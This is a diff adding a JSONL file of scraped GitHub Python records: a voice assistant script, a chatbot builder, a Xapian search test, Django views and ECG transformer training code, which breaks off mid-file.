diff --git "a/5443.jsonl" "b/5443.jsonl" new file mode 100644--- /dev/null +++ "b/5443.jsonl" @@ -0,0 +1,758 @@ +{"seq_id":"41003597653","text":"import os\r\nimport webbrowser\r\nfrom datetime import datetime\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nfrom googlesearch import search\r\nimport smtplib\r\nimport bluetooth\r\nimport pywifi\r\nimport time\r\nfrom pywifi import const\r\nimport speedtest\r\nimport pyautogui\r\nimport psutil\r\nimport randfacts\r\nimport packages\r\nimport sys\r\nimport browserhistory as bh\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport lxml\r\n#This is python text to speach.\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate',180)\r\n#you can change voice according to you by changing the number in voice[].\r\nengine.setProperty('voice', voices[3].id)\r\n\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n\r\n#This is to define date and time.\r\ndef wish_me():\r\n now = datetime.now()\r\n hours = int(now.strftime(\"%H\"))\r\n minn = now.strftime(\"%M\")\r\n sec = now.strftime(\"%S\")\r\n\r\n if hours >= 0 and hours < 12 :\r\n speak(\"Good Moring sir\")\r\n elif hours >= 12 and hours < 18 :\r\n speak(\"Good afternoon sir\")\r\n elif hours >= 18 :\r\n speak(\"Good evening sir\")\r\n\r\n if hours >= 0 and hours < 12:\r\n speak(f\"its {hours} {minn} AM\")\r\n elif hours >= 12 and hours < 24 :\r\n speak(f\"its {hours} {minn} PM\")\r\nwake =\"wake up\"\r\n#defineing takeCommand fn. it will recognize user audio input.\r\ndef takeCommand():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 0.6\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\")\r\n query = r.recognize_google(audio, language='en-in')\r\n print(f\"user said:{query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e)\r\n print(\"say that again please... 
OR cheak your internet \")\r\n return 'none'\r\n return query\r\ndef sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n speak(\"I need you email and its password, sir enter them below\")\r\n send_to2 = input(\"Enter your Email:- \")\r\n word = (input(\"Enter your password:- \"))\r\n server.login(send_to2, word)\r\n server.sendmail(send_to2, to, content)\r\n server.close()\r\nif __name__ == '__main__':\r\n name = \"Tegveer Singh\"\r\n wish_me()\r\n speak(\"i am Veronica here.\")\r\n speak(\"please tell what can i do for you sir..\")\r\n speak(\"i am Listening...\")\r\n while True:\r\n query = takeCommand().lower()\r\n #You should change the links,URLsand file location according to you.\r\n if query.count(wake)>0:\r\n speak(\"yes sir i am online and waiting for your command\")\r\n while True:\r\n query = takeCommand().lower()\r\n if 'fact' in query:\r\n x = randfacts.getFact()\r\n print(x)\r\n speak(x)\r\n elif 'wikipedia' in query:\r\n speak('Searching Wikipedia..')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=2)\r\n speak(\"According to Wikipedia\")\r\n speak(results)\r\n elif 'open youtube' in query:\r\n speak('opening youtube')\r\n webbrowser.open(\"youtube.com\")\r\n elif 'search' in query:\r\n speak('sir, what should i search')\r\n cm = takeCommand().lower()\r\n speak('heres what i found')\r\n webbrowser.open(f\"{cm}\")\r\n elif 'link' in query:\r\n speak('What do you want to search..')\r\n query = takeCommand().lower()\r\n speak('Searching google..')\r\n speak('I found 5 results')\r\n for i in search(query, tld=\"com\", num=5, stop=5, pause=2):\r\n print(i)\r\n speak(i)\r\n elif 'open drive' in query:\r\n speak('opening your drive')\r\n webbrowser.open(\"https://drive.google.com/drive/u/1/my-drive\")\r\n elif 'news' in query:\r\n Webpage = requests.get(\"https://timesofindia.indiatimes.com/india/timestopten.cms\")\r\n\r\n kab = BeautifulSoup(Webpage.content, \"lxml\")\r\n content = kab.find_all('a', class_=\"news_title\")\r\n #print(content)\r\n\r\n for row in content: # Print all occurrences\r\n print(row.get_text())\r\n speak(row.get_text())\r\n\r\n elif 'temperature' in query:\r\n\r\n Webpage = requests.get(\"https://hi.weather.town/en/forecast/india/state-of-chhattisgarh/dongargarh/\")\r\n\r\n kab = BeautifulSoup(Webpage.content, \"lxml\")\r\n Temp = kab.find('div', class_=\"temp\").text\r\n print(f\"Current Temperature is {Temp}\")\r\n speak(f\"Current Temperature is {Temp}\")\r\n TempMor = kab.find('div', class_=\"temperature\", id=\"infTempMorning\").text\r\n print(f\"Morning Temperature is{TempMor}\")\r\n speak(f\"Morning Temperature is{TempMor}\")\r\n TempNight = kab.find('div', class_=\"temperature\", id=\"infTempNight\").text\r\n print(f\"Night Temperature is{TempNight}\")\r\n speak(f\"Night Temperature is{TempNight}\") \r\n elif 'time' in query:\r\n speak(\"yes sir\")\r\n now = datetime.now()\r\n hours = int(now.strftime(\"%H\"))\r\n minn = now.strftime(\"%M\")\r\n sec = now.strftime(\"%S\")\r\n\r\n if hours >= 0 and hours < 12:\r\n speak(f\"its {hours} {minn} AM\")\r\n elif hours >= 12 and hours < 24 :\r\n speak(f\"its {hours} {minn} PM\")\r\n else :\r\n speak(\"sorry sir i am not able to tell it now.\")\r\n elif 'battery' in query:\r\n speak('checking battery status')\r\n battery = psutil.sensors_battery()\r\n battery_per = battery.percent\r\n speak(f\"your battery is {battery_per} percent charged\")\r\n if battery_per <= 50:\r\n speak(f\"your battery 
percent is {battery_per}. it is low plese plug in charger\")\r\n elif 'internet speed' in query:\r\n speak(\"testing internet speed\")\r\n st = speedtest.Speedtest()\r\n dl = st.download()\r\n up = st.upload()\r\n dl2 = dl * 0.000001\r\n up2 = up * 0.000001\r\n speak(f\"sir we have {dl2} mb per second downloading speed and {up2} mb per second upload ing speed\")\r\n elif 'open my channel' in query:\r\n speak('opening your channel')\r\n webbrowser.open(\"https://www.youtube.com/channel/UCXeDwy9_kgTjo3tyFY9E7Tw?view_as=subscriber\")\r\n elif 'open chess' in query:\r\n speak('opening chess')\r\n webbrowser.open(\"https://www.youtube.com/channel/UCeg7zY285sTls-uyzBDLfYw\")\r\n elif 'open google' in query:\r\n speak('opening google')\r\n webbrowser.open(\"google.com\")\r\n elif 'who created you veronica' in query:\r\n speak(\"Tegveer singh had created me. he is my god\")\r\n elif 'bluetooth' in query:\r\n speak(\"yes sir searching bluetooth\")\r\n nearby_devices = bluetooth.discover_devices(lookup_names=True)\r\n print(\"Found {} devices.\".format(len(nearby_devices)))\r\n speak(\"Found {} devices nearby\".format(len(nearby_devices)))\r\n if nearby_devices == []:\r\n speak(\"sir please check weather your bluetooth is on or not.\")\r\n speak(\"here are the devices what i found\")\r\n for addr, name in nearby_devices:\r\n print(\"{}\".format(name))\r\n speak(\"{}\".format(name))\r\n elif 'wi-fi' in query:\r\n speak(\"yes sir searching wifi\")\r\n wifi = pywifi.PyWiFi()\r\n\r\n Iface = wifi.interfaces()[0]\r\n name = Iface.name()\r\n Iface.scan()\r\n time.sleep(1)\r\n\r\n results = Iface.scan_results()\r\n for data in results:\r\n print(data.ssid)\r\n speak(data.ssid)\r\n elif \"what's my name\" in query:\r\n speak(name)\r\n ans = takeCommand().lower()\r\n if \"no\" in ans:\r\n speak(\"oh! sorry sir whats your name tell me i will remember it for future\")\r\n name = takeCommand().lower()\r\n else:\r\n speak(\"Something went wrong\")\r\n elif 'what can you do for me' in query:\r\n speak(\"Hii sir i can write Emails and send them, i can search on google, play music, dont worry if you got bored i can even play moives for you and many more\")\r\n elif 'good' in query:\r\n speak(\"Thank you sir,its my pleasure. 
any thing else\")\r\n elif 'volume up' in query:\r\n pyautogui.press(\"volumeup\")\r\n speak(\"volume is increased by two units\")\r\n elif 'volume down' in query:\r\n pyautogui.press(\"volumedown\")\r\n speak(\"volume is decreased by two units\")\r\n elif 'mute' in query:\r\n pyautogui.press(\"volumemute\")\r\n print(\"volume is muted.\")\r\n elif 'screenshot' in query:\r\n speak(\"sir please tell me the name of this screenshot file\")\r\n h = takeCommand().lower()\r\n speak(\"sir please hold the screen for few second, i am taking screenshot\")\r\n img = pyautogui.screenshot()\r\n img.save(f'{h}.png')\r\n speak(\" I am done with screenshot, i am ready for next command\")\r\n elif 'play music' in query:\r\n speak('playing music')\r\n from playsound import playsound\r\n playsound('E:/VIDEO & MP3&WALLPAPER/A.R.RAHMAN/TU HI RE')\r\n elif 'open vs code' in query:\r\n speak('opening v s code')\r\n codePath = \"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath)\r\n elif 'open blender' in query:\r\n speak('opening blender')\r\n codePath = \"C:\\\\Program Files\\\\Blender Foundation\\\\Blender 2.91\\\\blender.exe\"\r\n os.startfile(codePath)\r\n elif 'movie' in query:\r\n speak('let me show you some movie sir')\r\n codePath = \"E:\\VIDEO & MP3&WALLPAPER\\Video full hd\\Mere Wala Sardar (Full Song) _ Jugraj Sandhu _ New Song 2018 _ New Punjabi Songs 2018\"\r\n os.startfile(codePath)\r\n elif 'send email' in query:\r\n speak(\"Sir enter below To whom do you want to send Email \")\r\n send_to = input(\"To whom do you want to send Email:- \")\r\n try:\r\n speak('What should I say')\r\n content = takeCommand()\r\n to = send_to\r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry sir i am not able to sent Email right now.\")\r\n elif 'sleep' in query:\r\n speak(\"ok sir i am going to sleep,call me for anything else.\")\r\n break\r\n elif \"sleep\" in query:\r\n speak(\"ok veronica is terminating\")\r\n sys.exit()","repo_name":"tegveer1313/veronika","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36177471339","text":"import os\n\nfrom app.chatbot import Chatbot\nfrom app.components.embeddings.abstract.embeddings import Embeddings\nfrom app.components.language_models.abstract.language_model import LanguageModel\nfrom app.components.vectorstores.abstract.vectorStore import VectorStore\nfrom app.utils.collections.embeddings_collection import EmbeddingsCollection\nfrom app.utils.collections.language_model_collection import LanguageModelCollection\nfrom app.utils.collections.vectorstore_collection import VectorStoreCollection\nfrom app.utils.config_utils import ConfigUtils\n\n\nclass ChatbotBuilder:\n EMBEDDINGS_KEY = 'embeddings'\n VECTORSTORE_KEY = 'vectorstore'\n LANGUAGE_MODEL_KEY = 'language_model'\n\n def __init__(self, config_path: str):\n self.config_path = config_path\n self.config = ConfigUtils.load_config(config_path)\n\n def build(self) -> Chatbot:\n embeddings = self.create_embeddings()\n vectorstore = self.create_vectorstore(embeddings)\n language_model = self.create_language_model()\n return Chatbot(language_model, vectorstore)\n\n def create_embeddings(self) -> Embeddings:\n embeddings_strategy = self.config[self.EMBEDDINGS_KEY]['strategy']\n embeddings_class = 
EmbeddingsCollection().get_embeddings_class(embeddings_strategy)\n return embeddings_class(model_name=self.config[self.EMBEDDINGS_KEY]['model_name'])\n\n def create_vectorstore(self, embeddings: Embeddings) -> VectorStore:\n vectorstore_config = self.config[self.VECTORSTORE_KEY]\n\n local_path = os.getcwd() + '/' + vectorstore_config.get('local_path')\n if local_path is not None and os.path.isdir(local_path):\n save = False\n path = local_path\n strategy = vectorstore_config.get('local_strategy')\n else:\n save = True\n path = vectorstore_config.get('pdf_path')\n strategy = vectorstore_config.get('pdf_strategy')\n\n vectorstore_class = VectorStoreCollection().get_vectorstore(strategy)\n vectorstore = vectorstore_class(path=path, embeddings=embeddings.get_embedding())\n\n if save:\n local_vectorstore_dir = ConfigUtils.get_filename(vectorstore_config.get('pdf_path'))\n vectorstore_type = vectorstore_config.get('type')\n save_path = os.path.join(\n os.getcwd(),\n 'docs',\n 'vectorstores',\n vectorstore_type,\n local_vectorstore_dir\n )\n vectorstore.save(save_path)\n\n local_path = os.path.join(\n 'docs',\n 'vectorstores',\n vectorstore_type,\n local_vectorstore_dir\n )\n self.config[self.VECTORSTORE_KEY]['local_path'] = local_path\n self.config[self.VECTORSTORE_KEY]['local_strategy'] = 'FaissLoadLocalStrategy'\n ConfigUtils.write_config(config_path=self.config_path, config_data=self.config)\n\n return vectorstore\n\n def create_language_model(self) -> LanguageModel:\n language_model_strategy = self.config[self.LANGUAGE_MODEL_KEY]['strategy']\n language_model_class = LanguageModelCollection().get_language_model_class(language_model_strategy)\n return language_model_class(model_name=self.config[self.LANGUAGE_MODEL_KEY]['model_name'])\n","repo_name":"Quitzchell/chatbot-sandbox","sub_path":"app/builders/chatbot_builder.py","file_name":"chatbot_builder.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16895368590","text":"#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport json\nimport sys\nimport xapian\nimport os\nfrom nltk.corpus import stopwords # nltk for stopwords and stemming\nimport csv\n\nstop_es = stopwords.words('spanish')\n\nos.chdir('/home/felipe/Documents/IR')\n\ndbpath = \"./db4\"\n\noffset = 0 # Start the result set at the first value\npagesize = 100 # Number of items to return\n\n\n\n# Open the database\ndb = xapian.Database(dbpath)\n\n# Create the query parser and set the stemmer to Spanish\nqueryparser = xapian.QueryParser()\nqueryparser.set_stemmer(xapian.Stem(\"es\"))\n\nqueryparser.set_stemming_strategy(queryparser.STEM_ALL_Z)\ndoccount = 0\n\n#include stopwords\nstopper = xapian.SimpleStopper()\n\nfor word in stop_es:\n stopper.add(word)\n\nqueryparser.set_stopper(stopper)\n\n\nquery_title = 'Conferencia de la Mujer en Pekín'\nquery_text = 'Las posiciones controvertidas adoptadas por algunos delegados hicieron que la Conferencia mundial de la Mujer en Pekín se expusiese al fracaso.'\n\n# Parse the query\nquery = queryparser.parse_query(query_title + '\\n' + query_text)\n\n# Run the search\nenquire = xapian.Enquire(db)\nenquire.set_query(query)\n\nmatches = []\nscor=[]\nfor match in enquire.get_mset(offset, pagesize):\n fields = json.loads(match.document.get_data().decode('utf-8'))\n matches.append(fields)\n\nmyfile = open('testeb.csv', 'w')\nwr = csv.writer(myfile, 
quoting=csv.QUOTE_ALL)\nwr.writerow(matches)\nmyfile.close()","repo_name":"soares-f/IR_assignment","sub_path":"tests_search.py","file_name":"tests_search.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"74263112683","text":"from django.shortcuts import redirect, render\nfrom .models import Book, Author\nfrom .forms import BookForm, BookFormSet\n\n# Create your views here.\n\n\ndef create_book(request, pk):\n author = Author.objects.get(id=pk)\n formset = BookFormSet(request.POST or None)\n\n if request.method == \"POST\":\n if formset.is_valid():\n formset.instance = author\n formset.save()\n return redirect('book:create-book', pk=author.id)\n\n context = {\"formset\": formset, 'author': author}\n\n return render(request, \"books/create_book.html\", context)\n\ndef create_book_form(request):\n bookForm = BookForm(request.POST or None)\n context = {\"form\": bookForm}\n return render(request, \"books/create_book_form.html\", context)\n\n","repo_name":"danhdeng/django-dynamic-htmx","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71737957483","text":"import os\nimport sys\nimport math\nimport logging\nimport datetime\nfrom typing import Dict, Tuple, Union, Any\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom transformers import get_cosine_schedule_with_warmup, get_constant_schedule_with_warmup\nfrom tqdm import tqdm\n\nfrom ecg_transformer.util import *\nimport ecg_transformer.util.train as train_util\nfrom ecg_transformer.preprocess import EcgDataset, transform, PtbxlDataModule, get_ptbxl_splits, get_ptbxl_dataset\nfrom ecg_transformer.models.ecg_vit import EcgVitConfig, EcgVit\n\n\nclass EcgVitTrainModule(pl.LightningModule):\n def __init__(self, model: nn.Module, train_args: Dict = None, parent_trainer: 'MyPlTrainer' = None):\n super().__init__()\n self.model = model\n self.train_args, self.parent_trainer = train_args, parent_trainer\n\n def forward(self, **kwargs):\n return self.model(**kwargs)\n\n def configure_optimizers(self):\n optim, sch = self.train_args['optimizer'], self.train_args['schedule']\n optim_cls = torch.optim.AdamW if optim == 'AdamW' else torch.optim.Adam\n lr, dc = self.train_args['learning_rate'], self.train_args['weight_decay']\n optimizer = optim_cls(self.parameters(), lr=lr, weight_decay=dc)\n warmup_ratio, n_step = self.train_args['warmup_ratio'], self.train_args['n_step']\n ch_args = dict(optimizer=optimizer, num_warmup_steps=round(n_step*warmup_ratio))\n if sch == 'constant':\n sch = get_constant_schedule_with_warmup\n else:\n sch = get_cosine_schedule_with_warmup\n ch_args.update(dict(num_training_steps=n_step))\n scheduler = sch(**ch_args)\n return [optimizer], [dict(scheduler=scheduler, interval='step', frequency=1)]\n\n def training_step(self, batch, batch_idx):\n loss, logits = self(**batch)\n return dict(loss=loss, logits=logits.detach(), labels=batch['labels'].detach())\n\n def validation_step(self, batch, batch_idx):\n loss, logits = self(**batch)\n return dict(loss=loss, logits=logits.detach(), labels=batch['labels'].detach())\n\n def training_step_end(self, step_output):\n loss, logits, labels = 
step_output['loss'], step_output['logits'], step_output['labels']\n d_log = dict(epoch=self.current_epoch+1, step=self.global_step+1) # 1-indexed\n lr = self.parent_trainer.get_curr_learning_rate()\n d_update = { # colab compatibility\n **dict(learning_rate=lr, loss=loss.detach().item()),\n **train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True)\n }\n d_log.update({f'train/{k}': v for k, v in d_update.items()})\n self._log_info(d_log)\n\n def validation_epoch_end(self, outputs):\n loss = np.array([d['loss'].detach().item() for d in outputs]).mean()\n logits, labels = torch.cat([d['logits'] for d in outputs]), torch.cat([d['labels'] for d in outputs])\n preds_prob = torch.sigmoid(logits)\n d_log = dict(epoch=self.current_epoch+1, step=self.global_step+1)\n d_update = {**dict(loss=loss), **train_util.get_accuracy(preds_prob, labels)}\n for k, v in d_update.items():\n if not isinstance(v, dict):\n self.parent_trainer.pl_trainer.callback_metrics[k] = torch.tensor(v) # per `ModelCheckpoint`\n d_log.update({f'eval/{k}': v for k, v in d_update.items()})\n self._log_info(d_log)\n\n def _log_info(self, x):\n if self.parent_trainer is not None:\n self.parent_trainer.log(x)\n\n\nclass MyPlTrainer:\n \"\"\"\n Seems to be some problem with either the PL library or my implementation,\n that the logits for all inputs are all the same\n => Deprecated, see `MyTrainer`, where I don't observe the problem with my own training loop\n \"\"\"\n def __init__(\n self, name='EcgVit Train', model: nn.Module = None,\n data_module: PtbxlDataModule = None, train_args: Dict = None\n ):\n self.name = name\n self.save_time = now(for_path=True)\n self.train_args = train_args\n self.output_dir = self.train_args['output_dir'] = os.path.join(PATH_BASE, DIR_PROJ, DIR_MDL, self.save_time)\n learning_rate, weight_decay, train_batch_size, num_train_epoch, n_step = (self.train_args[k] for k in (\n 'learning_rate', 'weight_decay', 'train_batch_size', 'num_train_epoch', 'n_step'\n ))\n self.model, self.data_module = model, data_module\n self.pl_module = EcgVitTrainModule(model=model, train_args=train_args, parent_trainer=self)\n model_meta = model.meta\n self.train_meta = {'model': model_meta, '#epoch': num_train_epoch, '#step': n_step, 'bsz': train_batch_size}\n self.log_fnm = f'{model_meta[\"name\"]}, ' \\\n f'n={len(data_module.dset_tr)}, a={learning_rate}, dc={weight_decay}, ' \\\n f'bsz={train_batch_size}, n_ep={num_train_epoch}'\n self.logger, self.logger_fl, self.logger_tb, self.pl_trainer = None, None, None, None\n # cos the internal epoch for sanity check eval is always 0\n self._ran_sanity_check_eval, self._eval_epoch_count = False, 1\n\n def train(self):\n n_ep = self.train_args['num_train_epoch']\n self.logger: logging.Logger = get_logger(self.name)\n self.logger_fl = get_logger(\n name=self.name, typ='file-write', file_path=os.path.join(self.output_dir, f'{self.log_fnm}.log')\n )\n self.logger.info(f'Launched training model {logi(self.model.config)} '\n f'with args {log_dict_pg(self.train_args)} and {log_dict(self.train_meta)}... ')\n self.logger_fl.info(f'Launched training model {self.model.config} '\n f'with args {log_dict_id(self.train_args)} and {log_dict_nc(self.train_meta)}... 
')\n tb_fnm = f'tb - {self.log_fnm}'\n os.makedirs(os.path.join(self.output_dir, tb_fnm), exist_ok=True)\n self.logger_tb = TensorBoardLogger(self.output_dir, name=tb_fnm)\n callbacks = []\n if self.train_args['save_every_n_epoch']:\n callbacks.append(pl.callbacks.ModelCheckpoint(\n dirpath=os.path.join(self.output_dir, 'checkpoints'),\n monitor='loss', # having `eval/loss` seems to break the filename\n filename='checkpoint-{epoch:02d}, {loss:.2f}',\n every_n_epochs=self.train_args['save_every_n_epoch'],\n save_top_k=self.train_args['save_top_k'],\n save_last=True\n ))\n if self.train_args['tqdm']:\n callbacks.append(train_util.MyProgressBar())\n self.pl_trainer = pl.Trainer(\n logger=self.logger_tb,\n default_root_dir=self.output_dir,\n enable_progress_bar=self.train_args['tqdm'],\n callbacks=callbacks,\n gradient_clip_val=1,\n check_val_every_n_epoch=1 if self.train_args['do_eval'] else int(1e10),\n max_epochs=n_ep,\n log_every_n_steps=1,\n gpus=torch.cuda.device_count(),\n accelerator='auto',\n precision=self.train_args['precision'],\n num_sanity_val_steps=-1, # Runs & logs eval before training starts\n deterministic=True,\n detect_anomaly=True,\n move_metrics_to_cpu=True,\n )\n t_strt = datetime.datetime.now()\n self.pl_trainer.fit(self.pl_module, self.data_module)\n t = fmt_time(datetime.datetime.now() - t_strt)\n self.logger.info(f'Training completed in {logi(t)} ')\n self.logger_fl.info(f'Training completed in {t} ')\n\n def get_curr_learning_rate(self):\n assert self.pl_trainer is not None\n return self.pl_trainer.lr_scheduler_configs[0].scheduler.get_last_lr()[0]\n\n def log(self, msg):\n is_dict = isinstance(msg, dict)\n assert is_dict\n is_eval = not any('learning_rate' in k for k in msg.keys()) # heuristics to detect eval\n if is_eval:\n step = n_ep = msg['epoch']\n assert n_ep == self._eval_epoch_count\n if not self._ran_sanity_check_eval:\n self._ran_sanity_check_eval = True\n n_ep -= 1 # effectively, eval epoch is 0-indexed, unlike train logging\n self._eval_epoch_count -= 1\n self._eval_epoch_count += 1\n msg['epoch'] = self._eval_epoch_count-1\n del msg['step']\n else:\n step = msg['step']\n msg_ = train_util.pretty_log_dict(msg, ref=self.train_meta) if is_dict else msg\n should_log = True\n if self.train_args['log_per_epoch'] and not is_eval and msg['step'] % self.train_args['steps_per_epoch'] != 0:\n should_log = False\n if self.logger is not None and self.train_args['log_to_console'] and should_log:\n self.logger.info(log_dict(msg_) if is_dict else msg_)\n if self.logger_fl is not None:\n self.logger_fl.info(log_dict_nc(msg_) if is_dict else msg_)\n if self.logger_tb is not None and is_dict:\n if 'step' in msg:\n del msg['step']\n msg = {k: v for k, v in msg.items() if ('per_class_auc' not in k and 'epoch' not in k and bool(v))}\n self.logger_tb.log_metrics(msg, step=step)\n\n\nclass MyTrainer:\n \"\"\"\n My own training loop, fp16 not supported\n But it's faster than PL, even for CUDA without fp16\n \"\"\"\n tb_ignore_keys = ['step', 'epoch', 'per_class_auc']\n\n def __init__(\n self, name='EcgVit', model: EcgVit = None,\n train_dataset: EcgDataset = None, eval_dataset: EcgDataset = None, args: Dict = None\n ):\n self.name = name\n self.save_time = now(for_path=True)\n self.args = {**get_train_args(), **(args or dict())}\n self.output_dir = self.args['output_dir'] = os.path.join(PATH_BASE, DIR_PROJ, DIR_MDL, self.save_time)\n learning_rate, weight_decay, train_batch_size, num_train_epoch, n_step = (self.args[k] for k in (\n 'learning_rate', 'weight_decay', 
'train_batch_size', 'num_train_epoch', 'n_step'\n ))\n\n self.model, self.train_dataset, self.eval_dataset = model, train_dataset, eval_dataset\n self.optimizer, self.scheduler = None, None\n self.epoch, self.step = None, None\n\n to = self.args['augment_timeout']\n self.train_meta = {\n 'model': model.meta, '#epoch': num_train_epoch, '#step': n_step, 'bsz': train_batch_size, 'timeout': to\n }\n self.log_fnm = f'model={model.meta_str}, ' \\\n f'n={(train_dataset and len(train_dataset)) or \"NA\"}, a={learning_rate}, dc={weight_decay}, ' \\\n f'bsz={train_batch_size}, n_ep={num_train_epoch}, to={to}'\n self.logger, self.logger_fl, self.tb_writer = None, None, None\n\n def train(self):\n name = f'{self.name} Train'\n self.logger = get_logger(name)\n log_path = os.path.join(self.output_dir, f'{self.log_fnm}.log')\n self.logger_fl = get_logger(name=name, typ='file-write', file_path=log_path)\n self.logger.info(f'Launched training model {logi(self.model.config)} '\n f'with args {log_dict_pg(self.args)} and {log_dict(self.train_meta)}... ')\n self.logger_fl.info(f'Launched training model {self.model.config} '\n f'with args {log_dict_id(self.args)} and {log_dict_nc(self.train_meta)}... ')\n tb_fnm = f'tb - {self.log_fnm}'\n tb_path = os.path.join(self.output_dir, tb_fnm)\n os.makedirs(tb_path, exist_ok=True)\n self.tb_writer = SummaryWriter(tb_path)\n\n dl = DataLoader(self.train_dataset, batch_size=self.args['train_batch_size'], shuffle=True, pin_memory=True)\n optim_cls = torch.optim.AdamW if self.args['optimizer'] == 'AdamW' else torch.optim.Adam\n lr, dc = self.args['learning_rate'], self.args['weight_decay']\n self.optimizer = optim_cls(self.model.parameters(), lr=lr, weight_decay=dc)\n warmup_ratio, n_step = self.args['warmup_ratio'], self.args['n_step']\n sch, args = self.args['schedule'], dict(optimizer=self.optimizer, num_warmup_steps=round(n_step*warmup_ratio))\n if sch == 'constant':\n sch = get_constant_schedule_with_warmup\n else:\n sch = get_cosine_schedule_with_warmup\n args.update(dict(num_training_steps=n_step))\n self.scheduler = sch(**args)\n\n if torch.cuda.is_available():\n self.model.cuda()\n\n self.epoch, self.step = 0, 0\n best_eval_loss, n_bad_ep = float('inf'), 0\n t_strt = datetime.datetime.now()\n if self.args['do_eval']:\n self.model.train() # to pass assertion, see below\n self.evaluate()\n for _ in range(self.args['num_train_epoch']):\n self.epoch += 1\n self.model.train() # cos at the end of each eval, evaluate\n desc_epoch = self._get_epoch_desc()\n with tqdm(dl, desc=f'Train {desc_epoch}', unit='ba') as t_dl:\n for inputs in t_dl:\n # TODO: set_postfix\n self.step += 1\n self.optimizer.zero_grad()\n\n if torch.cuda.is_available():\n inputs = {k: v.cuda() for k, v in inputs.items()}\n outputs = self.model(**inputs)\n loss, logits = outputs.loss, outputs.logits.detach()\n labels = inputs['labels'].detach()\n loss_scalar = loss.detach().item()\n\n loss.backward()\n nn.utils.clip_grad_norm_(self.model.parameters(), max_norm=1.0, error_if_nonfinite=True)\n self.optimizer.step()\n self.scheduler.step()\n\n d_log = dict(epoch=self.epoch, step=self.step) # 1-indexed\n lr = self._get_lr()\n d_update = { # colab compatibility\n **dict(learning_rate=lr, loss=loss_scalar),\n **train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True)\n }\n pretty_loss = train_util.pretty_single('loss', loss_scalar)\n pretty_auc = train_util.pretty_single('auc', d_update['macro_auc'])\n t_dl.set_postfix(loss=pretty_loss, macro_auc=pretty_auc)\n d_log.update({f'train/{k}': v for 
k, v in d_update.items()})\n self.log(d_log)\n\n save_n_ep = self.args['save_every_n_epoch']\n if save_n_ep and self.epoch > 0 and self.epoch % save_n_ep == 0:\n fnm = f'model - {self.log_fnm}, ep{self.epoch}.pt'\n torch.save(self.model.state_dict(), os.path.join(self.output_dir, fnm))\n if self.args['do_eval']:\n eval_loss = self.evaluate()['eval/loss']\n\n if eval_loss < best_eval_loss:\n best_eval_loss = eval_loss\n n_bad_ep = 0\n else:\n n_bad_ep += 1\n if n_bad_ep >= self.args['patience']:\n t = fmt_time(datetime.datetime.now() - t_strt)\n d_pat = dict(epoch=self.epoch, patience=self.args['patience'], best_eval_loss=best_eval_loss)\n self.logger.info(f'Training terminated early for {log_dict(d_pat)} in {logi(t)} ')\n self.logger_fl.info(f'Training terminated early for {log_dict_nc(d_pat)} in {t}')\n break\n t = fmt_time(datetime.datetime.now() - t_strt)\n self.logger.info(f'Training completed in {logi(t)} ')\n self.logger_fl.info(f'Training completed in {t} ')\n self.logger, self.logger_fl, self.tb_writer = None, None, None # reset\n torch.save(self.model.state_dict(), os.path.join(self.output_dir, f'model - {self.log_fnm}.pt'))\n\n def evaluate(\n self, eval_dataset: EcgDataset = None, return_predictions: bool = False, loss_reduction: str = 'mean',\n ) -> Union[Dict[str, Any]]:\n \"\"\"\n :param eval_dataset: Eval dataset\n :param return_predictions: if True, return predictions & labels along with metrics\n :param loss_reduction:\n If 'mean', loss is averaged across all batches\n If 'none', loss is averaged for each sample and a tensor of length len(eval_dataset) is returned\n \"\"\"\n ca.check_mismatch('Eval Loss Reduction', loss_reduction, ['mean', 'none'])\n red_ori = self.model.loss_reduction\n self.model.loss_reduction = loss_reduction\n reduce = loss_reduction == 'mean'\n bsz = self.args['eval_batch_size']\n vl = eval_dataset or self.eval_dataset\n dl = DataLoader(vl, batch_size=bsz, shuffle=False)\n\n lst_loss, lst_logits, lst_labels = [], [], []\n training = self.model.training\n if not training: # no tqdm for eval if during training\n dl = tqdm(dl, desc='Evaluating... 
